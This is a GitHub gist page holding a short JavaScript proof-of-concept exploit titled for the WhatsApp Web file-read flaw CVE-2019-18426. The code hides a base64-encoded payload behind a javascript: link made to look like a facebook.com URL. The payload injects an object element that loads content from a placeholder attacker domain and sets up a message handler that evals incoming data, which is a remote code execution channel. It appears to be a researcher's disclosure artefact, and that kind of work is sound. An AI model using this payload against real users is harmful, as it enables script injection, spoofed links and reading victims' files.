Skip to content

Instantly share code, notes, and snippets.

@galpx

galpx/7.js

Created August 11, 2020 10:05
Show Gist options
  • Save galpx/014ef71fcf7aa70d80c808951cb5513c to your computer and use it in GitHub Desktop.
Save galpx/014ef71fcf7aa70d80c808951cb5513c to your computer and use it in GitHub Desktop.
Download ZIP
WhatsApp FS read vuln post CVE-2019-18426
Raw
7.js
var payload = `
hard_expire_time.innerHTML +=
'<object data="https://MY_MALICIOUS_DOMAIN/MY_PAYLOAD_IFRAME.html" />';
onmessage=(e)=>{eval(JSON.parse(e.data))};
`;
payload = `javascript:"https://facebook.com";eval(atob("${btoa(payload)}"))`;
e.__x_body = e.__x_matchedText = payload;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment